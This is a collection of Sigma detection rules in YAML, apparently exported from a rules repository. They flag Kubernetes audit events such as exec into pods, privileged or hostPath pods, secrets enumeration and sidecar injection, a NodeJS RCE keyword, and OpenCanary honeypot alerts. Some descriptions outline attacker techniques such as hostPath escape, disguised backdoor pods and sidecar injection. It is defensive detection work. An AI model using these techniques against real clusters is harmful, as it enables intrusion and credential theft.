    "path": "rules/application/kubernetes/audit/kubernetes_audit_exec_into_container.yml",
    "content": "title: Potential Remote Command Execution In Pod Container\nid: a1b0ca4e-7835-413e-8471-3ff2b8a66be6\nstatus: test\ndescription: |\n    Detects attempts to execute remote commands within a Pod's container using e.g. the \"kubectl exec\" command.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Exec%20into%20container/\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.t1609\n    - attack.execution\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'create'\n        objectRef.resource: 'pods'\n        objectRef.subresource: 'exec'\n    condition: selection\nfalsepositives:\n    - Legitimate debugging activity. Investigate the identity performing the requests and their authorization.\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_hostpath_mount.yml",
    "content": "title: Container With A hostPath Mount Created\nid: 402b955c-8fe0-4a8c-b635-622b4ac5f902\nstatus: test\ndescription: |\n    Detects creation of a container with a hostPath mount.\n    A hostPath volume mounts a directory or a file from the node to the container.\n    Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Writable%20hostPath%20mount/\n    - https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.t1611\n    - attack.privilege-escalation\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'create'\n        objectRef.resource: 'pods'\n        hostPath: '*' # Note: Add the \"exists\" when it's implemented in SigmaHQ/Aurora\n    condition: selection\nfalsepositives:\n    - The DaemonSet controller creates pods with hostPath volumes within the kube-system namespace.\nlevel: low\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_pod_in_system_namespace.yml",
    "content": "title: Creation Of Pod In System Namespace\nid: a80d927d-ac6e-443f-a867-e8d6e3897318\nstatus: test\ndescription: |\n    Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods.\n    System pods, created by controllers such as Deployments or DaemonSets, have random suffixes in their names.\n    Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection.\n    Deployment of such a backdoor container, e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Pod%20or%20container%20name%20similarily/\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'create'\n        objectRef.resource: 'pods'\n        objectRef.namespace: kube-system\n    condition: selection\nfalsepositives:\n    - System components such as daemon-set-controller and kube-scheduler also create pods in the kube-system namespace\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_privileged_pod_creation.yml",
    "content": "title: Privileged Container Deployed\nid: c5cd1b20-36bb-488d-8c05-486be3d0cb97\nstatus: test\ndescription: |\n    Detects the creation of a \"privileged\" container, an action which could be indicative of a threat actor mounting a container breakout attack.\n    A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact with and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host.\n    Various versions of \"privileged\" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Privileged%20container/\n    - https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-kubernetes.html#privilegeescalation-kubernetes-privilegedcontainer\n    - https://www.elastic.co/guide/en/security/current/kubernetes-pod-created-with-hostnetwork.html\n    - https://www.elastic.co/guide/en/security/current/kubernetes-container-created-with-excessive-linux-capabilities.html\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.t1611\n    - attack.privilege-escalation\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'create'\n        objectRef.resource: 'pods'\n        capabilities: '*' # Note: Add the \"exists\" when it's implemented in SigmaHQ/Aurora\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_rbac_permisions_listing.yml",
    "content": "title: RBAC Permission Enumeration Attempt\nid: 84b777bd-c946-4d17-aa2e-c39f5a454325\nstatus: test\ndescription: |\n    Detects identities attempting to enumerate their Kubernetes RBAC permissions.\n    In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment.\n    In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a \"kubectl auth can-i --list\" command.\n    This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/kubernetes-suspicious-self-subject-review.html\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.t1069.003\n    - attack.t1087.004\n    - attack.discovery\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'create'\n        apiGroup: 'authorization.k8s.io'\n        objectRef.resource: 'selfsubjectrulesreviews'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_rolebinding_modification.yml",
    "content": "title: Kubernetes Rolebinding Modification\nid: 10b97915-ec8d-455f-a815-9a78926585f6\nrelated:\n    - id: 0322d9f2-289a-47c2-b5e1-b63c90901a3e\n      type: similar\nstatus: test\ndescription: |\n    Detects when a Kubernetes Rolebinding is created or modified.\nreferences:\n    - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/\n    - https://medium.com/@seifeddinerajhi/kubernetes-rbac-privilege-escalation-exploits-and-mitigations-26c07629eeab\nauthor: kelnage\ndate: 2024-07-11\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        objectRef.apiGroup: 'rbac.authorization.k8s.io'\n        objectRef.resource:\n            - 'clusterrolebindings'\n            - 'rolebindings'\n        verb:\n            - 'create'\n            - 'delete'\n            - 'patch'\n            - 'replace'\n            - 'update'\n    condition: selection\nfalsepositives:\n    - Modifying a Kubernetes Rolebinding may need to be done by a system administrator.\n    - Automated processes may need to take these actions and may need to be filtered.\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_secrets_enumeration.yml",
    "content": "title: Kubernetes Secrets Enumeration\nid: eeb3e9e1-b685-44e4-9232-6bb701f925b5\nrelated:\n    - id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c\n      type: derived\nstatus: test\ndescription: Detects enumeration of Kubernetes secrets.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/List%20K8S%20secrets/\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.t1552.007\n    - attack.credential-access\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'list'\n        objectRef.resource: 'secrets'\n    condition: selection\nfalsepositives:\n    - The Kubernetes dashboard occasionally accesses the kubernetes-dashboard-key-holder secret\nlevel: low\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_secrets_modified_or_deleted.yml",
    "content": "title: Kubernetes Secrets Modified or Deleted\nid: 58d31a75-a4f8-4c40-985b-373d58162ca2\nrelated:\n    - id: 2f0bae2d-bf20-4465-be86-1311addebaa3\n      type: similar\nstatus: test\ndescription: |\n    Detects when Kubernetes Secrets are Modified or Deleted.\nreferences:\n    - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/\n    - https://commandk.dev/blog/guide-to-audit-k8s-secrets-for-compliance/\nauthor: kelnage\ndate: 2024-07-11\ntags:\n    - attack.credential-access\nlogsource:\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        objectRef.resource: 'secrets'\n        verb:\n            - 'create'\n            - 'delete'\n            - 'patch'\n            - 'replace'\n            - 'update'\n    condition: selection\nfalsepositives:\n    - Secrets being modified or deleted may be performed by a system administrator.\n    - Automated processes may need to take these actions and may need to be filtered.\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_serviceaccount_creation.yml",
    "content": "title: New Kubernetes Service Account Created\nid: e31bae15-83ed-473e-bf31-faf4f8a17d36\nrelated:\n    - id: 12d027c3-b48c-4d9d-8bb6-a732200034b2\n      type: derived\nstatus: test\ndescription: |\n    Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.\nreferences:\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/container%20service%20account/\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.persistence\n    - attack.t1136\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'create'\n        objectRef.resource: 'serviceaccounts'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_sidecar_injection.yml",
    "content": "title: Potential Sidecar Injection Into Running Deployment\nid: ad9012a6-e518-4432-9890-f3b82b8fc71f\nstatus: test\ndescription: |\n    Detects attempts to inject a sidecar container into a running deployment.\n    A sidecar container is an additional container within a pod that resides alongside the main container.\n    One way to add containers to running resources like Deployments/DaemonSets/StatefulSets is via a \"kubectl patch\" operation.\n    By injecting a new container into a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separate pod in the cluster.\nreferences:\n    - https://kubernetes.io/docs/tasks/manage-kubernetes-objects/update-api-object-kubectl-patch\n    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Sidecar%20Injection/\nauthor: Leo Tsaousis (@laripping)\ndate: 2024-03-26\ntags:\n    - attack.t1609\n    - attack.execution\nlogsource:\n    category: application\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        verb: 'patch'\n        apiGroup: 'apps'\n        objectRef.resource: 'deployments'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_unauthorized_unauthenticated_actions.yml",
    "content": "title: Kubernetes Unauthorized or Unauthenticated Access\nid: 0d933542-1f1f-420d-97d4-21b2c3c492d9\nstatus: test\ndescription: |\n    Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used.\n    This may indicate an attacker attempting to leverage credentials they have obtained.\nreferences:\n    - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/\n    - https://www.datadoghq.com/blog/monitor-kubernetes-audit-logs/#monitor-api-authentication-issues\nauthor: kelnage\ndate: 2024-04-12\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: kubernetes\n    service: audit\ndetection:\n    selection:\n        responseStatus.code:\n            - 401 # Unauthorized\n            - 403 # Forbidden\n    condition: selection\nfalsepositives:\n    - A misconfigured RBAC policy, a mistake by a valid user, or a wider issue with authentication tokens can also generate these errors.\nlevel: low\n"
  },
  {
    "path": "rules/application/nodejs/nodejs_rce_exploitation_attempt.yml",
    "content": "title: Potential RCE Exploitation Attempt In NodeJS\nid: 97661d9d-2beb-4630-b423-68985291a8af\nstatus: test\ndescription: Detects process execution related errors in NodeJS. If the exceptions are caused by user input, they may suggest an RCE vulnerability.\nreferences:\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: nodejs\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords:\n        - 'node:child_process'\n    condition: keywords\nfalsepositives:\n    - Puppeteer invocation exceptions often contain child_process related errors; this doesn't necessarily mean that the app is vulnerable.\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_ftp_login_attempt.yml",
    "content": "title: OpenCanary - FTP Login Attempt\nid: 6991bc2b-ae2e-447f-bc55-3a1ba04c14e5\nstatus: test\ndescription: Detects instances where an FTP service on an OpenCanary node has had a login attempt.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.initial-access\n    - attack.exfiltration\n    - attack.lateral-movement\n    - attack.t1190\n    - attack.t1021\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 2000\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_git_clone_request.yml",
    "content": "title: OpenCanary - GIT Clone Request\nid: 4fe17521-aef3-4e6a-9d6b-4a7c8de155a8\nstatus: test\ndescription: Detects instances where a GIT service on an OpenCanary node has had a Git Clone request.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.collection\n    - attack.t1213\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 16001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_http_get.yml",
    "content": "title: OpenCanary - HTTP GET Request\nid: af6c3078-84cd-4c68-8842-08b76bd81b13\nstatus: test\ndescription: Detects instances where an HTTP service on an OpenCanary node has received a GET request.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 3000\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_http_post_login_attempt.yml",
    "content": "title: OpenCanary - HTTP POST Login Attempt\nid: af1ac430-df6b-4b38-b976-0b52f07a0252\nstatus: test\ndescription: |\n    Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 3001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_httpproxy_login_attempt.yml",
    "content": "title: OpenCanary - HTTPPROXY Login Attempt\nid: 5498fc09-adc6-4804-b9d9-5cca1f0b8760\nstatus: test\ndescription: |\n    Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 7001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_mssql_login_sqlauth.yml",
    "content": "title: OpenCanary - MSSQL Login Attempt Via SQLAuth\nid: 3ec9a16d-0b4f-4967-9542-ebf38ceac7dd\nstatus: test\ndescription: |\n    Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1003\n    - attack.t1213\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 9001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_mssql_login_winauth.yml",
    "content": "title: OpenCanary - MSSQL Login Attempt Via Windows Authentication\nid: 6e78f90f-0043-4a01-ac41-f97681613a66\nstatus: test\ndescription: |\n    Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1003\n    - attack.t1213\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 9002\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_mysql_login_attempt.yml",
    "content": "title: OpenCanary - MySQL Login Attempt\nid: e7d79a1b-25ed-4956-bd56-bd344fa8fd06\nstatus: test\ndescription: Detects instances where a MySQL service on an OpenCanary node has had a login attempt.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1003\n    - attack.t1213\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 8001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_ntp_monlist.yml",
    "content": "title: OpenCanary - NTP Monlist Request\nid: 7cded4b3-f09e-405a-b96f-24248433ba44\nstatus: test\ndescription: Detects instances where an NTP service on an OpenCanary node has had an NTP monlist request.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.impact\n    - attack.t1498\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 11001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_portscan_nmap_fin_scan.yaml",
    "content": "title: OpenCanary - NMAP FIN Scan\nid: eae8c0c8-e5da-450a-9d7d-66aa56cd26b6\nstatus: experimental\ndescription: Detects instances where an OpenCanary node has been targeted by a NMAP FIN Scan\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Marco Pedrinazzi (@pedrinazziM)\ndate: 2026-01-06\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 5005\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_portscan_nmap_null_scan.yaml",
    "content": "title: OpenCanary - NMAP NULL Scan\nid: 68b8547b-107f-43f3-97fb-900a7d63c190\nstatus: experimental\ndescription: Detects instances where an OpenCanary node has been targeted by a NMAP NULL Scan\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Marco Pedrinazzi (@pedrinazziM)\ndate: 2026-01-06\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 5003\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_portscan_nmap_os_scan.yaml",
    "content": "title: OpenCanary - NMAP OS Scan\nid: e8a677fd-248c-4eab-94df-de2f6f645884\nstatus: experimental\ndescription: Detects instances where an OpenCanary node has been targeted by a NMAP OS Scan\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Marco Pedrinazzi (@pedrinazziM)\ndate: 2026-01-06\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 5002\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_portscan_nmap_xmas_scan.yaml",
    "content": "title: OpenCanary - NMAP XMAS Scan\nid: d7553d7b-f485-479c-b192-cdac6edd83a4\nstatus: experimental\ndescription: Detects instances where an OpenCanary node has been targeted by a NMAP XMAS Scan\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Marco Pedrinazzi (@pedrinazziM)\ndate: 2026-01-06\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 5004\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_portscan_syn_scan.yaml",
    "content": "title: OpenCanary - Host Port Scan (SYN Scan)\nid: 974be8d2-283e-4033-ab08-7505b84204d0\nstatus: experimental\ndescription: Detects instances where an OpenCanary node has been targeted by a SYN port scan.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Marco Pedrinazzi (@pedrinazziM)\ndate: 2026-01-06\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 5001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_rdp_connection_attempt.yaml",
    "content": "title: OpenCanary - RDP New Connection Attempt\nid: 598290cf-5932-45cd-9123-be1e05ab4f2e\nstatus: experimental\ndescription: Detects instances where an RDP service on an OpenCanary node has had a connection attempt.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Marco Pedrinazzi (@pedrinazziM)\ndate: 2026-01-06\ntags:\n    - attack.initial-access\n    - attack.lateral-movement\n    - attack.t1133\n    - attack.t1021.001\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 14001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_redis_command.yml",
    "content": "title: OpenCanary - REDIS Action Command Attempt\nid: 547dfc53-ebf6-4afe-8d2e-793d9574975d\nstatus: test\ndescription: Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1003\n    - attack.t1213\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 17001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_sip_request.yml",
    "content": "title: OpenCanary - SIP Request\nid: e30de276-68ec-435c-ab99-ef3befec6c61\nstatus: test\ndescription: Detects instances where a SIP service on an OpenCanary node has had a SIP request.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.collection\n    - attack.t1123\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 15001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_smb_file_open.yml",
    "content": "title: OpenCanary - SMB File Open Request\nid: 22777c9e-873a-4b49-855f-6072ab861a52\nstatus: test\ndescription: Detects instances where an SMB service on an OpenCanary node has had a file open request.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.lateral-movement\n    - attack.collection\n    - attack.t1021\n    - attack.t1005\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 5000\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_snmp_cmd.yml",
    "content": "title: OpenCanary - SNMP OID Request\nid: e9856028-fd4e-46e6-b3d1-10f7ceb95078\nstatus: test\ndescription: Detects instances where an SNMP service on an OpenCanary node has had an OID request.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.discovery\n    - attack.lateral-movement\n    - attack.t1016\n    - attack.t1021\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 13001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_ssh_login_attempt.yml",
    "content": "title: OpenCanary - SSH Login Attempt\nid: ff7139bc-fdb1-4437-92f2-6afefe8884cb\nstatus: test\ndescription: Detects instances where an SSH service on an OpenCanary node has had a login attempt.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.lateral-movement\n    - attack.persistence\n    - attack.t1133\n    - attack.t1021\n    - attack.t1078\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 4002\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_ssh_new_connection.yml",
    "content": "title: OpenCanary - SSH New Connection Attempt\nid: cd55f721-5623-4663-bd9b-5229cab5237d\nstatus: test\ndescription: Detects instances where an SSH service on an OpenCanary node has had a connection attempt.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.lateral-movement\n    - attack.persistence\n    - attack.t1133\n    - attack.t1021\n    - attack.t1078\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 4000\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_telnet_login_attempt.yml",
    "content": "title: OpenCanary - Telnet Login Attempt\nid: 512cff7a-683a-43ad-afe0-dd398e872f36\nstatus: test\ndescription: Detects instances where a Telnet service on an OpenCanary node has had a login attempt.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.command-and-control\n    - attack.t1133\n    - attack.t1078\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 6001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
